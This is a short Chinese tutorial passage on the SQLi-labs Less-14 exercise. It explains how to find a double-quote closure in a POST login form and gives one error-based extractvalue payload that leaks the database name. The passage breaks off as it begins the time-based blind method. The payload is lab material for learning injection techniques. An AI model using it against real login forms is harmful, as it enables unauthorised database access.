Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
在password输入"会报错 "#就不报错了 那么应该是“”的闭合
但是没有回显的值 只有报错的信息,只能盲注
方法一,报错型
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200320030434905.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ppbWdnZw==,size_16,color_FFFFFF,t_70)
方法二,时间型盲注
uname